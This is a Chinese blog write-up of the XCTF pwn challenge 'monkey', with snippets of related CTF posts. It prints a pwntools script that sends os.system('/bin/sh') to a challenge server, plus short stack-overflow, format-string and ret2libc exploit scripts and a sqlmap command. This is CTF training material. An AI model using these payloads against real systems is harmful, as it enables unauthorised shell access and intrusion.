[攻防世界 pwn]——monkey

最新推荐文章于 2023-12-30 12:08:04 发布
原创 最新推荐文章于 2023-12-30 12:08:04 发布 · 1k 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文围绕攻防世界pwn题monkey展开。题目checksec无异常,在IDA中较复杂。通过输入尝试,发现输入未定义内容有类似Linux命令输错的反馈,猜测可直接输命令。查看字符串发现加os.后部分命令可用,且按上下键能查看历史命令,类似终端。

[攻防世界 pwn]——monkey

额,怎么说呢这道题。checksec没什么大不了的
在这里插入图片描述
但是再IDA中就懵了,好大呀。好多文件。进入mian函数,也没有看很明白。准备运行程序看看到底是干什么的,帮助分析一下

输入尝试输入aaaa,发现返回的东西没有被定义。我们在Linux命令中有时命令输入错误也是这样。猜测它可能直接让输入命令。结果输入help可以,但是有的命令可以有的不可以
在这里插入图片描述
在IDA中查看一下字符串,因为它可以输入的字符串肯定有体现,因为输入help下面就有help的提示。
在这里插入图片描述
发现了file,不过它前面多了个os. 再去试试加上os.之后是否可以。发现,竟然真的可以,幸好看到了file。因为这个是Linux上面的一个命令。

在这里插入图片描述

其实有一个最关键的暗示,就是你按上下键你会发现,你之前输入的命令可以查看。感觉就是一个终端。

exploit

from pwn import *
p = remote('111.200.241.244',37916)
context.log_level = 'debug'
p.recv()
p.sendline("os.system('/bin/sh')")
p.interactive()
monkey [XCTF-PWN][高手进阶区]CTF writeup攻防世界题解系列18
重新启程
12-25 2131
题目地址:monkey 本题是高手进阶区的第七题,先看看题目 继续是一道2星难度的题目,那就下载附件看看情况 root@mypwn:/ctf/work/python/monkey# ls -l total 34972 -rw-r--r-- 1 root root 9544403 Dec 25 01:00 05fb160732b5493dae565b8c3f35474f.zip -rwxr...
攻防世界-pwn新手区-level0
CHAWUCIREN1的博客
07-26 366
下载附件,执行一下,64位程序 checksec一下 NX执行保护开启 丢进ida里面分析一下 F5反编译 发现return到一个函数里面,点击查看一下 发现申请的栈空间是0x80,read的值却是0x200,说明存在栈溢出 然后点击callsystem这个函数, 发现shell,也就是说我们需要利用栈溢出覆盖到callsystem函数的返回地址0x400596执行shell。 查看buf的栈空间 shell_addr = 0x400596 payload = ‘A’*(0x80+8) + p.
攻防世界pwn——monkey
qq_62076255的博客
12-21 509
做题记录
CTF学习日记----攻防世界pwn高手区monkey
派大星的博客
11-16 367
这。。。。。。 https://blog.youkuaiyun.com/fastergohome/article/details/103693289
ADworld pwn wp - monkey
fa1c4的blog
06-27 133
一个js解释器, 胡乱把玩一下, 发现可以执行js函数 直接在服务器上执行 os.system("ls") os.system("cat flag")
攻防世界pwn——pwn1
qq_62076255的博客
12-21 679
做题记录
攻防世界pwn——level3
qq_62076255的博客
11-05 890
攻防世界pwn——level3
攻防世界pwn——stack2
qq_62076255的博客
12-18 865
攻防世界pwn——stack2做题记录
攻防世界pwn——string
qq_62076255的博客
11-05 859
攻防世界pwn——string
攻防世界pwn——cgpwn2
qq_62076255的博客
11-05 499
攻防世界pwn——cgpwn2
SmartMonkey
12-05
一个简单的猴子测试工具,随机点击界面,输入随机字符和键盘按键,对于某些类型的控件做出特定的动作,监视被测试程序的进程信息,能识别出程序是否出现异常,持续记录内存和CPU使用情况,方便发现是否存在内存泄漏问题,持续截屏,方便追溯和问题定位。
攻防世界】mobile easy-so writeup
2301_77295404的博客
12-30 457
从下面的代码知道,它调用了cyberspace的CheckString方法,而这个CheckString调用了so里的函数。这样就很容易理解,它主要是用于交换输入字符串的字符。下面是它的逆向,输出就是flag。CheckString方法里J_TestDec方法,用于对传入的字符串做处理。上面的c++代码有点乱,为了方便理解,我用python代码重写了。
攻防世界Web前五题
Monkey_D_Luffy__的博客
11-28 2410
1.view source 右键无法查看源码,直接按f12查看源码,获取flag 2.robots Robots协议(也称为爬虫协议、爬虫规则、机器人协议等)也叫robots.txt,是一种存放于网站根目录下的ASCII编码的文本文件。 所以应在URL后加上/robots.txt 接着访问f1ag_1s_h3re.php获取flag 3.backup 题目描述:X老师忘记删除备份文件,他派小宁同学去把备份文件找出来,一起来帮小宁同学吧! 备份文件 bak(被自动或是通过命令创建的辅..
攻防世界 四(进阶篇)catch-me
sjt670994562的博客
06-13 1613
后来做题速度完全掉了下去,主要是因为基础太差,不管是c、python语言基础,还是汇编基础,还是linux使用,shell脚本的编写,都差太多,所以经过这几天的冲刺,我打算从基础开始,不急于求成,题会做,但不会那么着急了,太急了学的东西也是没用的,这是这几天卡在这道题上,以及同学对我的一些批评总结出来的一些观点。 catch-me 分析,不是elf不是exe,扔到C32Asm,看到头文件 FD 3...
攻防世界(新手篇)
sjt670994562的博客
06-02 1万+
作为刚刚进入reserve的小白,这几天在攻防世界的一些解题 no_strings_attached 一看没有exe,估计是linux的文件了,扔进C32Asm里 果然elf文件 先用扔进ida分析,发现主要函数authenticate,找到他的地址 OK,接下来就是扔到linux的gdb里面分析啦(这里我用的是peda显示的更方便点) 用b来下断点,b*0x08048708,然后r运行,n单...
攻防世界-RE-三题WP
WocW的博客
04-25 1762
1.re2-cpp-is-awesome 分析 打开看看,发现需要一个参数。在IDA里查找这个luck next time,交叉引用 再次交叉引用,发现到main函数。 这里就是关键的对比了,看起来像是v8经过某个处理后与明文表对比。动态调试看看,下端点在v8,发现我们所输入的字符串没有被处理过,那就更简单了,直接最原始的明文对比。 每次将执行到这里会出现一个flag明文,在下面的跳转指...
攻防世界(高手进阶区)——NewsCenter
知足且坚定,温柔且上进
02-11 2208
御剑扫一下,发现有robots.txt与config.php,不过是个空白页面;放弃。 用burpsuite抓包,: 尝试xff,无果,直接sql注入,利用sqlmap. 将Request中的Raw内容拷贝到一个txt文档,用sqlmap爆。(注意将文档拷贝到sqlmap文件所在位置) sqlmap.py -r flag.txt --dbs 发现两个包,分别尝试,只有news有: sqlm...
xctf攻防世界pwn基础题解(新手食用)
热门推荐
Spwpun的博客
05-01 2万+
文章目录CGFsb status:updating… CGFsb 前面的那一道get_shell的题算是做pwn题的一般流程:下载文件,ida查看代码,分析漏洞,利用漏洞写出exp,最常用的是用到python的pwntools,然后使用nc或者pwntools连接到虚拟场景实现漏洞攻击得到flag。 本题的思路基本一致,使用pwntools编写漏洞利用脚本,这里的漏洞是格式化字符串漏洞,文章分...
[XCTF-pwn] 8-monkey 9-warmup 20_csaw-ctf-2016-quals-aul
weixin_52640415的博客
03-03 505
这个题不会,搜了下wp原来这么简单,一直用js都是写网页,没用过os库 题目是个大文件,基本没法看。运行后出提示符,打help有点提示。 其实就是个js的解释器,直接运行命令就能拿到flag js> os.system('cat flag') os.system('cat flag') cyberpeace{fbbe21cdff06b6bb983a88c58185de99} js> ...
攻防世界 PWN
最新发布
12-12
攻防世界PWN有多个题目及对应的解题资料,以下是部分介绍: - **new_easypwn**:检查保护机制可知,该程序为amd64 - 64 - little架构,有部分RELRO,存在Canary,开启了NX和PIE。`readelf -h`显示ELF文件头信息,包含Magic、Class、Data等内容,可用于进一步的攻击点分析[^1]。 ```plaintext healer@healer-virtual-machine:~/Desktop/attachments$ checksec hello [*] '/home/healer/Desktop/attachments/hello' Arch: amd64-64-little RELRO: Partial RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled healer@healer-virtual-machine:~/Desktop/attachments$ readelf -h hello ELF Header: Magic: 7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00 Class: ELF64 Data: 2's complement, little endian Version: 1 (current) OS/ABI: UNIX - System V ABI Version: 0 Type: DYN (Shared object file) Machine: Advanced Micro Devices X86-64 Version: 0x1 Entry point address: 0xa00 Start of program headers: 64 (bytes into file) Start of section headers: 8648 (bytes into file) Flags: 0x0 Size of this header: 64 (bytes) Size of program headers: 56 (bytes) Number of program headers: 9 Size of section headers: 64 (bytes) Number of section headers: 29 Section header string table index: 28 ``` - **签到题**:这是较为简单的题目,无需复杂操作,直接连接远程服务即可获得shell并拿到flag。 ```python from pwn import * r = remote("111.198.29.45", 59457) r.interactive() r.close() ``` - **新手区某题**:利用`printf`返回字符个数的特性,将`pwnme`的值改成8。 ```python from pwn import * pwnme_addr = 0x804A068 payload = p32(pwnme_addr) + 'a'*4 + '%10$n' r = remote('111.200.241.244', 55843) r.recvuntil('name:') r.sendline('233') r.recvuntil('please:') r.sendline(payload) r.interactive() ``` - **[GFSJ0469] string**:题目有一段背景描述,“欢迎来到我的世界!我是一个巫师……可能会帮助你更好地了解它。”,但未给出解题代码,推测需结合这段信息进行后续分析[^4]。 - **pwn - 200**:通过泄露`write`地址,返回`main`函数,计算偏移找到`system`和`/bin/sh`的位置,最终获得shell。 ```python from pwn import * from LibcSearcher import * p = remote("111.200.241.244", 33327) elf = ELF('./pwn') write_got = elf.got['write'] write_plt = elf.plt['write'] main_addr = 0x080484BE payload = 'a' * (0x6c + 0x4) + p32(write_plt) + p32(main_addr) + p32(1) + p32(write_got) + p32(8) p.recvline() p.sendline(payload) write_addr = u32(p.recv(4)) print hex(write_addr) libc = LibcSearcher('write', write_addr) libc_base = write_addr - libc.dump('write') system_addr = libc_base + libc.dump('system') binsh = libc_base + libc.dump('str_bin_sh') payload = 'a' * (0x6c + 0x4) + p32(system_addr) + 'junk' + p32(binsh) p.sendline(payload) p.interactive() ```
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值